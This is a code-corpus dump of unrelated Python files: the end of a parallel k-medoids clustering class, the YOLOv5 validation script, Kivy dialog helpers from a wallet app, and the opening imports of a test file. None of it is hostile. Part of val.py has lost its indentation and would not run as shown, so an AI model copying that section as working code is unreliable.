        print("Medoids updated")
        return updated_medoids

    # multiprocessing worker function:
    # for a given point, calculate it's distortion and queue it track which medoid we are considering to replace
    def queue_new_medoid_i_distortion(self, q, medoid_index, data_index, initial_distortion_i, medoid_assignments):
        # calculate the distortion of the new data point
        medoid_index, new_distortion_i = self.per_medoid_distortion(medoid_index, self.dataSet[data_index], medoid_assignments)
        # if the distortion is smaller than the distortion of the medoid it is proposed to be replacing, queue the value
        if new_distortion_i < initial_distortion_i:
            # place the smaller distortion on the queue
            q.put([medoid_index, new_distortion_i, data_index])

    # function for calculating the distortion of a given point/medoid
    def per_medoid_distortion(self, medoid_index, medoid, medoid_assignments, q=None):
        medoid_position = medoid.tolist()[:-1]
        distortion_i = 0
        # collect all data points that belong to the cluster identified by the medoid index
        cluster_members = []
        for j in range(len(medoid_assignments)):
            assignment = medoid_assignments[j]
            if assignment == medoid_index:
                cluster_members.append(self.dataSet[j].reshape(1, self.dataSet.shape[1]))
        # check if there are any members
        if len(cluster_members) > 0:
            # calcluate the distances from the medoid to all the cluster members using
            # the already written knn function get_k_neighbors
            cluster_members = np.concatenate(cluster_members)
            cluster_point_distances = self.nn.get_k_neighbors(cluster_members, medoid_position, len(cluster_members))
            # for each point in the cluster, get its distance and add it's
            # squared value to the distortion aggregator
            for cluster_point in cluster_point_distances:
                distance_to_proposed_medoid = cluster_point[0]
                distortion_i += (distance_to_proposed_medoid)**2
        # for flexibility, if a queue is given, queue the distortion, otherwise return it
        if q is None:
            return[medoid_index, distortion_i]
        else:
            q.put([medoid_index, distortion_i])

    # target function for aggregating parallel computations
    # collect all computations and save them when they are smaller than the current distortion
    def update_processor(self, q, current_medoids, initial_distortion):
        medoids = copy.deepcopy(current_medoids)
        count = 0
        # listen for new computations
        while True:
            # get the next computation
            distortion_element = q.get()
            # if it is a flag to stop working, return the result and break
            if distortion_element == 'kill':
                q.put(medoids)
                break
            # for the given medoid index, check if the new distortion value is smaller
            medoid_index, new_distortion_i, new_x_index = distortion_element
            initial_distortion_i = initial_distortion[medoid_index]
            # if it is, replace it with the new value
            if new_distortion_i < initial_distortion_i:
                initial_distortion[medoid_index] = new_distortion_i
                medoids[medoid_index] = self.dataSet[new_x_index]

    #Parameters: N/a
    #Returns: Return the list of updated medoid values
    #Function: Generate and update the feature mean values for each medoids
    def generate_cluster_medoids(self):
        #Store off the first assignment value
        first_assignment = self.assign_all_points_to_closest_medoid(self.initial_medoids, self.dataSet)
        #Store the update medoids value based on the first assignment
        updated_medoids = self.update_medoids_parallel(self.initial_medoids, first_assignment, self.dataSet)
        #Set a count to be 0
        count = 0
        # print("count: ", count)
        while True:
            #Set a second assignment and store the value
            second_assignment = self.assign_all_points_to_closest_medoid(updated_medoids, self.dataSet)
            # code for indicating if the medoid assignments are changing
            count += 1
            #Create an empty array
            changing_assignments = []
            #For each of the values until the first assignment
            for i in range(len(first_assignment)):
                #If the first assignment is not equal to the second assignment value
                if first_assignment[i] != second_assignment[i]:
                    #Store the value off
                    changing_assignments.append(i)
            print("medoid assignments that are changing", changing_assignments)
            #If the first is equal to the second or we are beyond the iteration limit set
            if first_assignment == second_assignment or count > self.itermax:
                #Break
                break
            #Store the updated medoids from the second assignment values calculated above
            updated_medoids = self.update_medoids_parallel(updated_medoids, second_assignment, self.dataSet)
            #Set the first assignment equal to the second assignment
            first_assignment = second_assignment
        #Return the updated medoids
        return updated_medoids

    #Parameters: N/a
    #Returns: Return the classification list
    #Function: Return the classification of the test data based on the medoids
    def classify(self):
        #Store the generated random medoids
        medoids = self.generate_cluster_medoids()
        return self.knn.classify(medoids, self.Testdata)
####################################### UNIT TESTING #################################################
if __name__ == '__main__':
    print("program Start")
    categorical_attribute_indices = {
        "segmentation": [],
        "vote": [0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15],
        "glass": [],
        "fire": [0,1,2,3],
        "machine": [0,1],
        "abalone": [0]
    }
    regression_data_set = {
        "segmentation": False,
        "vote": False,
        "glass": False,
        "fire": True,
        "machine": True,
        "abalone": True
    }
    feature_data_types = {
        "segmentation": 'real',
        "vote": 'categorical',
        "glass": 'real',
        "fire": 'mixed',
        "machine": 'mixed',
        "abalone": 'mixed'
    }
    data_sets = [ "segmentation", "vote", "glass", "fire", "machine", "abalone"]
    tuned_k = {
        "segmentation": 2,
        "vote": 5,
        "glass": 2,
        "fire": 2,
        "machine": 5,
        "abalone": 12
    }
    tuned_bin_value = {
        "segmentation": .25,
        "vote": .25,
        "glass": .25,
        "fire": .1,
        "machine": .25,
        "abalone": .1
    }
    tuned_delta_value = {
        "segmentation": .25,
        "vote": .25,
        "glass": .25,
        "fire": .5,
        "machine": .1,
        "abalone": .5
    }
    tuned_error_value = {
        "fire": 1,
        "abalone": 1,
        "machine":2
    }
    tuned_cluster_number = {
        "segmentation": 80,
        "vote": 15,
        "glass": 60,
        # not sure about fire, weird behavior
        "fire": 60,
        "machine": 50,
        "abalone": 50
    }
    for i in range(1):
        data_set = "vote"
        print("Data set: ", data_set)
        du = DataUtility.DataUtility(categorical_attribute_indices, regression_data_set)
        headers, full_set, tuning_data, tenFolds = du.generate_experiment_data(data_set)
        test = copy.deepcopy(tenFolds[0])
        training = np.concatenate(tenFolds[1:])
        d = len(headers)-1
        # BUG FIX: this previously called the undefined name
        # "kMedoidsClustering_P" (NameError at runtime); the class defined
        # in this module is kMedoids_parallel.
        kMC_p = kMedoids_parallel(
            kNeighbors=tuned_k[data_set],
            kValue=5,
            dataSet=training,
            data_type=feature_data_types[data_set],
            categorical_features=categorical_attribute_indices[data_set],
            regression_data_set=regression_data_set[data_set],
            alpha=1,
            beta=1,
            h=tuned_bin_value[data_set],
            d=d,
            Testdata=test
        )
        kMC = kMedoidsClustering.kMedoidsClustering(
            kNeighbors=tuned_k[data_set],
            kValue=5,
            dataSet=training,
            data_type=feature_data_types[data_set],
            categorical_features=categorical_attribute_indices[data_set],
            regression_data_set=regression_data_set[data_set],
            alpha=1,
            beta=1,
            h=tuned_bin_value[data_set],
            d=d,
            Testdata=test
        )
        kMC.initial_medoids = kMC_p.initial_medoids
        medoids_p = kMC_p.generate_cluster_medoids()
        print(kMC_p.classify())
        # print("dataset medoids: ", medoids, f"(length: {len(medoids)})")
        # print("original dataset: ", kMC.dataSet, f"(length: {len(kMC.dataSet)}")
    print("program end ")
####################################### UNIT TESTING #################################################
|
val.py | # YOLOv5 🚀 by Ultralytics, GPL-3.0 license
"""
Validate a trained YOLOv5 model accuracy on a custom dataset
Usage:
$ python path/to/val.py --weights yolov5s.pt --data coco128.yaml --img 640
Usage - formats:
$ python path/to/val.py --weights yolov5s.pt # PyTorch
yolov5s.torchscript # TorchScript
yolov5s.onnx # ONNX Runtime or OpenCV DNN with --dnn
yolov5s.xml # OpenVINO
yolov5s.engine # TensorRT
yolov5s.mlmodel # CoreML (MacOS-only)
yolov5s_saved_model # TensorFlow SavedModel
yolov5s.pb # TensorFlow GraphDef
yolov5s.tflite # TensorFlow Lite
yolov5s_edgetpu.tflite # TensorFlow Edge TPU
"""
import argparse
import json
import os
import sys
from pathlib import Path
from threading import Thread
import numpy as np
import torch
from tqdm import tqdm
FILE = Path(__file__).resolve()
ROOT = FILE.parents[0] # YOLOv5 root directory
if str(ROOT) not in sys.path:
sys.path.append(str(ROOT)) # add ROOT to PATH
ROOT = Path(os.path.relpath(ROOT, Path.cwd())) # relative
from models.common import DetectMultiBackend
from utils.callbacks import Callbacks
from utils.datasets import create_dataloader
from utils.general import (LOGGER, box_iou, check_dataset, check_img_size, check_requirements, check_yaml,
coco80_to_coco91_class, colorstr, increment_path, non_max_suppression, print_args,
scale_coords, xywh2xyxy, xyxy2xywh)
from utils.metrics import ConfusionMatrix, ap_per_class
from utils.plots import output_to_target, plot_images, plot_val_study
from utils.torch_utils import select_device, time_sync
def save_one_txt(predn, save_conf, shape, file):
    # Save one image's predictions to a YOLO-format *.txt label file.
    # predn: (N, 6) tensor of [x1, y1, x2, y2, conf, cls] boxes.
    # shape: (height, width) of the original image, used for normalization.
    # file: destination path; one line per box is appended.
    gn = torch.tensor(shape)[[1, 0, 1, 0]]  # normalization gain whwh
    # Open the file once instead of re-opening it for every box (previous
    # version called open() inside the loop).
    with open(file, 'a') as f:
        for *xyxy, conf, cls in predn.tolist():
            xywh = (xyxy2xywh(torch.tensor(xyxy).view(1, 4)) / gn).view(-1).tolist()  # normalized xywh
            line = (cls, *xywh, conf) if save_conf else (cls, *xywh)  # label format
            f.write(('%g ' * len(line)).rstrip() % line + '\n')
def save_one_json(predn, jdict, path, class_map):
    # Append one image's detections to *jdict* as COCO-style records:
    # {"image_id": 42, "category_id": 18, "bbox": [258.15, 41.29, 348.26, 243.78], "score": 0.236}
    stem = path.stem
    image_id = int(stem) if stem.isnumeric() else stem
    box = xyxy2xywh(predn[:, :4])  # xywh
    box[:, :2] -= box[:, 2:] / 2  # xy center to top-left corner
    for pred, b in zip(predn.tolist(), box.tolist()):
        jdict.append({
            'image_id': image_id,
            'category_id': class_map[int(pred[5])],
            'bbox': [round(coord, 3) for coord in b],
            'score': round(pred[4], 5),
        })
def process_batch(detections, labels, iouv):
    """
    Return correct predictions matrix. Both sets of boxes are in (x1, y1, x2, y2) format.
    Arguments:
        detections (Array[N, 6]), x1, y1, x2, y2, conf, class
        labels (Array[M, 5]), class, x1, y1, x2, y2
    Returns:
        correct (Array[N, 10]), for 10 IoU levels
    """
    # One boolean column per IoU threshold in iouv; starts all-False.
    correct = torch.zeros(detections.shape[0], iouv.shape[0], dtype=torch.bool, device=iouv.device)
    iou = box_iou(labels[:, 1:], detections[:, :4])
    x = torch.where((iou >= iouv[0]) & (labels[:, 0:1] == detections[:, 5]))  # IoU above threshold and classes match
    if x[0].shape[0]:
        matches = torch.cat((torch.stack(x, 1), iou[x[0], x[1]][:, None]), 1).cpu().numpy()  # [label, detection, iou]
        if x[0].shape[0] > 1:
            # Greedy 1:1 matching: sort candidate pairs by IoU (best first),
            # then keep at most one label per detection and one detection per
            # label. The order of these dedup steps is deliberate.
            matches = matches[matches[:, 2].argsort()[::-1]]
            matches = matches[np.unique(matches[:, 1], return_index=True)[1]]
            # matches = matches[matches[:, 2].argsort()[::-1]]
            matches = matches[np.unique(matches[:, 0], return_index=True)[1]]
        matches = torch.Tensor(matches).to(iouv.device)
        # A detection counts as correct at every IoU level its match clears.
        correct[matches[:, 1].long()] = matches[:, 2:3] >= iouv
    return correct
@torch.no_grad()
def run(data,
        weights=None,  # model.pt path(s)
        batch_size=32,  # batch size
        imgsz=640,  # inference size (pixels)
        conf_thres=0.001,  # confidence threshold
        iou_thres=0.6,  # NMS IoU threshold
        task='val',  # train, val, test, speed or study
        device='',  # cuda device, i.e. 0 or 0,1,2,3 or cpu
        workers=8,  # max dataloader workers (per RANK in DDP mode)
        single_cls=False,  # treat as single-class dataset
        augment=False,  # augmented inference
        verbose=False,  # verbose output
        save_txt=False,  # save results to *.txt
        save_hybrid=False,  # save label+prediction hybrid results to *.txt
        save_conf=False,  # save confidences in --save-txt labels
        save_json=False,  # save a COCO-JSON results file
        project=ROOT / 'runs/val',  # save to project/name
        name='exp',  # save to project/name
        exist_ok=False,  # existing project/name ok, do not increment
        half=True,  # use FP16 half-precision inference
        dnn=False,  # use OpenCV DNN for ONNX inference
        model=None,  # pre-loaded model (set when called from train.py)
        dataloader=None,  # pre-built dataloader (set when called from train.py)
        save_dir=Path(''),
        plots=True,
        # NOTE(review): default Callbacks() is created once at import time and
        # shared across calls — confirm this sharing is intended.
        callbacks=Callbacks(),
        compute_loss=None,
        ):
    """Validate a YOLOv5 model on a dataset and compute P/R/mAP metrics.

    Two entry modes: when *model* is given (called from train.py) the device,
    dataloader and save_dir are reused as-is; otherwise the model is loaded
    from *weights* and a dataloader is created here.

    Returns a 3-tuple:
        (mp, mr, map50, map, *val_losses), per-class mAP array, per-image speeds (ms).
    """
    # Initialize/load model and set device
    training = model is not None
    if training:  # called by train.py
        device, pt, jit, engine = next(model.parameters()).device, True, False, False  # get model device, PyTorch model
        half &= device.type != 'cpu'  # half precision only supported on CUDA
        model.half() if half else model.float()
    else:  # called directly
        device = select_device(device, batch_size=batch_size)

        # Directories
        save_dir = increment_path(Path(project) / name, exist_ok=exist_ok)  # increment run
        (save_dir / 'labels' if save_txt else save_dir).mkdir(parents=True, exist_ok=True)  # make dir

        # Load model
        model = DetectMultiBackend(weights, device=device, dnn=dnn, data=data)
        stride, pt, jit, onnx, engine = model.stride, model.pt, model.jit, model.onnx, model.engine
        imgsz = check_img_size(imgsz, s=stride)  # check image size
        half &= (pt or jit or onnx or engine) and device.type != 'cpu'  # FP16 supported on limited backends with CUDA
        if pt or jit:
            model.model.half() if half else model.model.float()
        elif engine:
            # TensorRT engines fix their batch size and input precision at
            # export time, so the runtime settings must follow the engine.
            batch_size = model.batch_size
            if model.trt_fp16_input != half:
                LOGGER.info('model ' + (
                    'requires' if model.trt_fp16_input else 'incompatible with') + ' --half. Adjusting automatically.')
                half = model.trt_fp16_input
        else:
            half = False
            batch_size = 1  # export.py models default to batch-size 1
            device = torch.device('cpu')
            LOGGER.info(f'Forcing --batch-size 1 square inference shape(1,3,{imgsz},{imgsz}) for non-PyTorch backends')

        # Data
        data = check_dataset(data)  # check

    # Configure
    model.eval()
    is_coco = isinstance(data.get('val'), str) and data['val'].endswith('coco/val2017.txt')  # COCO dataset
    nc = 1 if single_cls else int(data['nc'])  # number of classes
    iouv = torch.linspace(0.5, 0.95, 10).to(device)  # iou vector for mAP@0.5:0.95
    niou = iouv.numel()

    # Dataloader
    if not training:
        model.warmup(imgsz=(1 if pt else batch_size, 3, imgsz, imgsz), half=half)  # warmup
        pad = 0.0 if task in ('speed', 'benchmark') else 0.5
        rect = False if task == 'benchmark' else pt  # square inference for benchmarks
        task = task if task in ('train', 'val', 'test') else 'val'  # path to train/val/test images
        dataloader = create_dataloader(data[task], imgsz, batch_size, stride, single_cls, pad=pad, rect=rect,
                                       workers=workers, prefix=colorstr(f'{task}: '))[0]

    seen = 0
    confusion_matrix = ConfusionMatrix(nc=nc)
    names = {k: v for k, v in enumerate(model.names if hasattr(model, 'names') else model.module.names)}
    class_map = coco80_to_coco91_class() if is_coco else list(range(1000))
    s = ('%20s' + '%11s' * 6) % ('Class', 'Images', 'Labels', 'P', 'R', 'mAP@.5', 'mAP@.5:.95')
    # dt accumulates [pre-process, inference, NMS] wall times in seconds.
    dt, p, r, f1, mp, mr, map50, map = [0.0, 0.0, 0.0], 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0
    loss = torch.zeros(3, device=device)
    jdict, stats, ap, ap_class = [], [], [], []
    pbar = tqdm(dataloader, desc=s, bar_format='{l_bar}{bar:10}{r_bar}{bar:-10b}')  # progress bar
    for batch_i, (im, targets, paths, shapes) in enumerate(pbar):
        t1 = time_sync()
        if pt or jit or engine:
            im = im.to(device, non_blocking=True)
            targets = targets.to(device)
        im = im.half() if half else im.float()  # uint8 to fp16/32
        im /= 255  # 0 - 255 to 0.0 - 1.0
        nb, _, height, width = im.shape  # batch size, channels, height, width
        t2 = time_sync()
        dt[0] += t2 - t1

        # Inference
        out, train_out = model(im) if training else model(im, augment=augment, val=True)  # inference, loss outputs
        dt[1] += time_sync() - t2

        # Loss
        if compute_loss:
            loss += compute_loss([x.float() for x in train_out], targets)[1]  # box, obj, cls

        # NMS
        targets[:, 2:] *= torch.Tensor([width, height, width, height]).to(device)  # to pixels
        lb = [targets[targets[:, 0] == i, 1:] for i in range(nb)] if save_hybrid else []  # for autolabelling
        t3 = time_sync()
        out = non_max_suppression(out, conf_thres, iou_thres, labels=lb, multi_label=True, agnostic=single_cls)
        dt[2] += time_sync() - t3

        # Metrics (per image in the batch)
        for si, pred in enumerate(out):
            labels = targets[targets[:, 0] == si, 1:]
            nl = len(labels)
            tcls = labels[:, 0].tolist() if nl else []  # target class
            path, shape = Path(paths[si]), shapes[si][0]
            seen += 1

            if len(pred) == 0:
                # No predictions: record an empty entry so recall still counts
                # the nl missed targets.
                if nl:
                    stats.append((torch.zeros(0, niou, dtype=torch.bool), torch.Tensor(), torch.Tensor(), tcls))
                continue

            # Predictions
            if single_cls:
                pred[:, 5] = 0
            predn = pred.clone()
            scale_coords(im[si].shape[1:], predn[:, :4], shape, shapes[si][1])  # native-space pred

            # Evaluate
            if nl:
                tbox = xywh2xyxy(labels[:, 1:5])  # target boxes
                scale_coords(im[si].shape[1:], tbox, shape, shapes[si][1])  # native-space labels
                labelsn = torch.cat((labels[:, 0:1], tbox), 1)  # native-space labels
                correct = process_batch(predn, labelsn, iouv)
                if plots:
                    confusion_matrix.process_batch(predn, labelsn)
            else:
                correct = torch.zeros(pred.shape[0], niou, dtype=torch.bool)
            stats.append((correct.cpu(), pred[:, 4].cpu(), pred[:, 5].cpu(), tcls))  # (correct, conf, pcls, tcls)

            # Save/log
            if save_txt:
                save_one_txt(predn, save_conf, shape, file=save_dir / 'labels' / (path.stem + '.txt'))
            if save_json:
                save_one_json(predn, jdict, path, class_map)  # append to COCO-JSON dictionary
            callbacks.run('on_val_image_end', pred, predn, path, names, im[si])

        # Plot images (first 3 batches only, in background threads)
        if plots and batch_i < 3:
            f = save_dir / f'val_batch{batch_i}_labels.jpg'  # labels
            Thread(target=plot_images, args=(im, targets, paths, f, names), daemon=True).start()
            f = save_dir / f'val_batch{batch_i}_pred.jpg'  # predictions
            Thread(target=plot_images, args=(im, output_to_target(out), paths, f, names), daemon=True).start()

    # Compute metrics
    stats = [np.concatenate(x, 0) for x in zip(*stats)]  # to numpy
    if len(stats) and stats[0].any():
        tp, fp, p, r, f1, ap, ap_class = ap_per_class(*stats, plot=plots, save_dir=save_dir, names=names)
        ap50, ap = ap[:, 0], ap.mean(1)  # AP@0.5, AP@0.5:0.95
        mp, mr, map50, map = p.mean(), r.mean(), ap50.mean(), ap.mean()
        nt = np.bincount(stats[3].astype(np.int64), minlength=nc)  # number of targets per class
    else:
        nt = torch.zeros(1)

    # Print results
    pf = '%20s' + '%11i' * 2 + '%11.3g' * 4  # print format
    LOGGER.info(pf % ('all', seen, nt.sum(), mp, mr, map50, map))

    # Print results per class
    if (verbose or (nc < 50 and not training)) and nc > 1 and len(stats):
        for i, c in enumerate(ap_class):
            LOGGER.info(pf % (names[c], seen, nt[c], p[i], r[i], ap50[i], ap[i]))

    # Print speeds
    t = tuple(x / seen * 1E3 for x in dt)  # speeds per image
    if not training:
        shape = (batch_size, 3, imgsz, imgsz)
        LOGGER.info(f'Speed: %.1fms pre-process, %.1fms inference, %.1fms NMS per image at shape {shape}' % t)

    # Plots
    if plots:
        confusion_matrix.plot(save_dir=save_dir, names=list(names.values()))
        callbacks.run('on_val_end')

    # Save JSON
    if save_json and len(jdict):
        w = Path(weights[0] if isinstance(weights, list) else weights).stem if weights is not None else ''  # weights
        anno_json = str(Path(data.get('path', '../coco')) / 'annotations/instances_val2017.json')  # annotations json
        pred_json = str(save_dir / f"{w}_predictions.json")  # predictions json
        LOGGER.info(f'\nEvaluating pycocotools mAP... saving {pred_json}...')
        with open(pred_json, 'w') as f:
            json.dump(jdict, f)

        try:  # https://github.com/cocodataset/cocoapi/blob/master/PythonAPI/pycocoEvalDemo.ipynb
            check_requirements(['pycocotools'])
            from pycocotools.coco import COCO
            from pycocotools.cocoeval import COCOeval

            anno = COCO(anno_json)  # init annotations api
            pred = anno.loadRes(pred_json)  # init predictions api
            eval = COCOeval(anno, pred, 'bbox')
            if is_coco:
                eval.params.imgIds = [int(Path(x).stem) for x in dataloader.dataset.im_files]  # image IDs to evaluate
            eval.evaluate()
            eval.accumulate()
            eval.summarize()
            map, map50 = eval.stats[:2]  # update results (mAP@0.5:0.95, mAP@0.5)
        except Exception as e:
            # pycocotools evaluation is best-effort; metrics above still stand.
            LOGGER.info(f'pycocotools unable to run: {e}')

    # Return results
    model.float()  # for training
    if not training:
        s = f"\n{len(list(save_dir.glob('labels/*.txt')))} labels saved to {save_dir / 'labels'}" if save_txt else ''
        LOGGER.info(f"Results saved to {colorstr('bold', save_dir)}{s}")
    maps = np.zeros(nc) + map
    for i, c in enumerate(ap_class):
        maps[c] = ap[i]
    return (mp, mr, map50, map, *(loss.cpu() / len(dataloader)).tolist()), maps, t
def parse_opt():
    """Parse command-line options for stand-alone validation.

    Returns the argparse.Namespace after resolving the dataset YAML path and
    deriving dependent flags (--save-json for coco.yaml, --save-txt when
    --save-hybrid is set).
    """
    parser = argparse.ArgumentParser()
    parser.add_argument('--data', type=str, default=ROOT / 'data/coco128.yaml', help='dataset.yaml path')
    parser.add_argument('--weights', nargs='+', type=str, default=ROOT / 'yolov5s.pt', help='model.pt path(s)')
    parser.add_argument('--batch-size', type=int, default=32, help='batch size')
    parser.add_argument('--imgsz', '--img', '--img-size', type=int, default=640, help='inference size (pixels)')
    parser.add_argument('--conf-thres', type=float, default=0.001, help='confidence threshold')
    parser.add_argument('--iou-thres', type=float, default=0.6, help='NMS IoU threshold')
    parser.add_argument('--task', default='val', help='train, val, test, speed or study')
    parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
    parser.add_argument('--workers', type=int, default=8, help='max dataloader workers (per RANK in DDP mode)')
    parser.add_argument('--single-cls', action='store_true', help='treat as single-class dataset')
    parser.add_argument('--augment', action='store_true', help='augmented inference')
    parser.add_argument('--verbose', action='store_true', help='report mAP by class')
    parser.add_argument('--save-txt', action='store_true', help='save results to *.txt')
    parser.add_argument('--save-hybrid', action='store_true', help='save label+prediction hybrid results to *.txt')
    parser.add_argument('--save-conf', action='store_true', help='save confidences in --save-txt labels')
    parser.add_argument('--save-json', action='store_true', help='save a COCO-JSON results file')
    parser.add_argument('--project', default=ROOT / 'runs/val', help='save to project/name')
    parser.add_argument('--name', default='exp', help='save to project/name')
    parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment')
    parser.add_argument('--half', action='store_true', help='use FP16 half-precision inference')
    parser.add_argument('--dnn', action='store_true', help='use OpenCV DNN for ONNX inference')
    opt = parser.parse_args()
    opt.data = check_yaml(opt.data)  # check YAML
    # COCO runs always produce the JSON needed for pycocotools evaluation.
    opt.save_json |= opt.data.endswith('coco.yaml')
    # Hybrid label output is written through the --save-txt path.
    opt.save_txt |= opt.save_hybrid
    print_args(FILE.stem, opt)
    return opt
def main(opt):
    """Dispatch to run() according to --task: normal validation, a speed
    benchmark over several weight files, or a speed-vs-mAP "study" sweep
    over image sizes."""
    check_requirements(requirements=ROOT / 'requirements.txt', exclude=('tensorboard', 'thop'))

    if opt.task in ('train', 'val', 'test'):  # run normally
        if opt.conf_thres > 0.001:  # https://github.com/ultralytics/yolov5/issues/1466
            LOGGER.info(f'WARNING: confidence threshold {opt.conf_thres} >> 0.001 will produce invalid mAP values.')
        run(**vars(opt))

    else:
        weights = opt.weights if isinstance(opt.weights, list) else [opt.weights]
        opt.half = True  # FP16 for fastest results
        if opt.task == 'speed':  # speed benchmarks
            # python val.py --task speed --data coco.yaml --batch 1 --weights yolov5n.pt yolov5s.pt...
            opt.conf_thres, opt.iou_thres, opt.save_json = 0.25, 0.45, False
            # NOTE: `for opt.weights in weights` deliberately rebinds the
            # attribute so run(**vars(opt)) sees each weight file in turn.
            for opt.weights in weights:
                run(**vars(opt), plots=False)

        elif opt.task == 'study':  # speed vs mAP benchmarks
            # python val.py --task study --data coco.yaml --iou 0.7 --weights yolov5n.pt yolov5s.pt...
            for opt.weights in weights:
                f = f'study_{Path(opt.data).stem}_{Path(opt.weights).stem}.txt'  # filename to save to
                x, y = list(range(256, 1536 + 128, 128)), []  # x axis (image sizes), y axis
                for opt.imgsz in x:  # img-size
                    LOGGER.info(f'\nRunning {f} --imgsz {opt.imgsz}...')
                    r, _, t = run(**vars(opt), plots=False)
                    y.append(r + t)  # results and times
                np.savetxt(f, y, fmt='%10.4g')  # save
            os.system('zip -r study.zip study_*.txt')
            plot_val_study(x=x)  # plot
# CLI entry point: parse options then validate.
if __name__ == "__main__":
    opt = parse_opt()
    main(opt)
|
utils.py | import os
import threading
from io import StringIO
from kivy.clock import mainthread
from kivy.lang import Builder
from kivy.metrics import dp
from kivy.uix.boxlayout import BoxLayout
from kivy.utils import platform
from kivymd.dialog import MDDialog
from kivymd.label import MDLabel
from kivymd.snackbar import Snackbar
from layoutmargin import AddMargin, MarginLayout
def run_in_thread(fn):
    """
    Decorator to run a function in a thread.
    >>> 1 + 1
    2
    >>> @run_in_thread
    ... def threaded_sleep(seconds):
    ...     from time import sleep
    ...     sleep(seconds)
    >>> thread = threaded_sleep(0.1)
    >>> type(thread)
    <class 'threading.Thread'>
    >>> thread.is_alive()
    True
    >>> thread.join()
    >>> thread.is_alive()
    False
    """
    # Local import keeps the module's top-level dependencies unchanged.
    from functools import wraps

    # wraps() preserves fn's __name__/__doc__ on the wrapper so decorated
    # functions remain introspectable (the original wrapper hid them).
    @wraps(fn)
    def run(*k, **kw):
        t = threading.Thread(target=fn, args=k, kwargs=kw)
        t.start()
        return t  # caller may join() or inspect the thread
    return run
def load_kv_from_py(f):
    """
    Loads file.kv for given file.py.
    """
    directory = os.path.dirname(os.path.abspath(f))
    stem = os.path.basename(os.path.splitext(f)[0])
    Builder.load_file(os.path.join(directory, stem + '.kv'))
def check_write_permission():
    """
    Android runtime storage permission check.
    """
    if platform == "android":
        from android.permissions import Permission, check_permission
        return check_permission(Permission.WRITE_EXTERNAL_STORAGE)
    # Non-Android platforms need no runtime permission.
    return True
def check_request_write_permission(callback=None):
    """
    Android runtime storage permission check & request.
    """
    granted = check_write_permission()
    if granted:
        return granted
    # Permission is missing: request it asynchronously and report the
    # pre-request state, exactly like the original implementation.
    from android.permissions import Permission, request_permissions
    request_permissions([Permission.WRITE_EXTERNAL_STORAGE], callback)
    return granted
class StringIOCBWrite(StringIO):
    """
    Inherits StringIO, provides callback on write.
    """

    def __init__(self, initial_value='', newline='\n', callback_write=None):
        """
        Overloads the StringIO.__init__() makes it possible to hook a callback
        for write operations.
        """
        # callable invoked with the written string after each write(), or None
        self.callback_write = callback_write
        super().__init__(initial_value, newline)

    def write(self, s):
        """
        Calls the StringIO.write() method then the callback_write with
        given string parameter.

        Returns the number of characters written, matching the
        io.TextIOBase.write contract (the previous version returned None,
        which broke callers relying on the count).
        """
        written = super().write(s)
        if self.callback_write is not None:
            self.callback_write(s)
        return written
class Dialog(object):
    """Helper around KivyMD dialogs and snackbars.

    Tracks every dialog it creates in a class-level list (guarded by a lock)
    so they can all be dismissed programmatically via dismiss_all_dialogs().
    """

    # keeps track of all dialogs alive
    dialogs = []
    # guards concurrent access to the dialogs list
    __lock = threading.Lock()

    @staticmethod
    @mainthread
    def snackbar_message(text):
        # @mainthread defers the UI call to the Kivy main thread.
        Snackbar(text=text).show()

    @classmethod
    def show_invalid_form_dialog(cls):
        title = "Invalid form"
        body = "Please check form fields."
        dialog = cls.create_dialog(title, body)
        dialog.open()

    @classmethod
    def on_dialog_dismiss(cls, dialog):
        """
        Removes it from the dialogs track list.
        """
        with cls.__lock:
            try:
                cls.dialogs.remove(dialog)
            except ValueError:
                # fails silently if the dialog was dismissed twice, refs:
                # https://github.com/AndreMiras/PyWallet/issues/89
                pass

    @classmethod
    def dismiss_all_dialogs(cls):
        """
        Dispatches dismiss event for all dialogs.
        """
        # keeps a local copy since we're altering them as we iterate
        dialogs = cls.dialogs[:]
        for dialog in dialogs:
            dialog.dispatch('on_dismiss')

    @classmethod
    def create_dialog_content_helper(cls, title, content):
        """
        Creates a dialog from given title and content.
        Adds it to the dialogs track list.
        """
        # TODO: review the fixed dialog height
        dialog = MDDialog(
            title=title,
            content=content,
            size_hint=(.8, None),
            height=dp(250),
            auto_dismiss=False)
        dialog.bind(on_dismiss=cls.on_dialog_dismiss)
        with cls.__lock:
            cls.dialogs.append(dialog)
        return dialog

    @classmethod
    def create_dialog_helper(cls, title, body):
        """
        Creates a dialog from given title and body.
        Adds it to the dialogs track list.
        """
        content = MDLabel(
            font_style='Body1',
            theme_text_color='Secondary',
            text=body,
            size_hint_y=None,
            valign='top')
        content.bind(texture_size=content.setter('size'))
        dialog = cls.create_dialog_content_helper(title, content)
        return dialog

    @classmethod
    def create_dialog(cls, title, body):
        """
        Creates a dialog from given title and body.
        Adds it to the dialogs track list.
        Appends dismiss action.
        """
        dialog = cls.create_dialog_helper(title, body)
        dialog.add_action_button(
            "Dismiss",
            action=lambda *x: dialog.dismiss())
        return dialog

    @classmethod
    def on_balance_connection_error(cls):
        title = "Network error"
        body = "Couldn't load balance, no network access."
        dialog = cls.create_dialog(title, body)
        dialog.open()

    @classmethod
    def on_balance_value_error(cls):
        title = "Decode error"
        # fixed double negative ("Couldn't not decode") in the user message
        body = "Couldn't decode balance data."
        dialog = cls.create_dialog(title, body)
        dialog.open()

    @classmethod
    def on_balance_unknown_error(cls):
        title = "Unknown error"
        body = "Unknown error while fetching balance."
        dialog = cls.create_dialog(title, body)
        dialog.open()

    @classmethod
    def on_history_connection_error(cls):
        title = "Network error"
        body = "Couldn't load history, no network access."
        dialog = cls.create_dialog(title, body)
        dialog.open()

    @classmethod
    def on_history_value_error(cls):
        title = "Decode error"
        # fixed double negative ("Couldn't not decode") in the user message
        body = "Couldn't decode history data."
        dialog = cls.create_dialog(title, body)
        dialog.open()
class BoxLayoutMarginLayout(MarginLayout, BoxLayout):
    # BoxLayout combined with layoutmargin's MarginLayout mixin.
    pass
class BoxLayoutAddMargin(AddMargin, BoxLayout):
    # BoxLayout combined with layoutmargin's AddMargin mixin.
    pass
|
test_client.py | import asyncio
import contextlib
import functools
import gc
import inspect
import logging
import os
import pickle
import random
import subprocess
import sys
import threading
import traceback
import warnings
import weakref
import zipfile
from collections import deque
from contextlib import suppress
from functools import partial
from operator import add
from threading import Semaphore
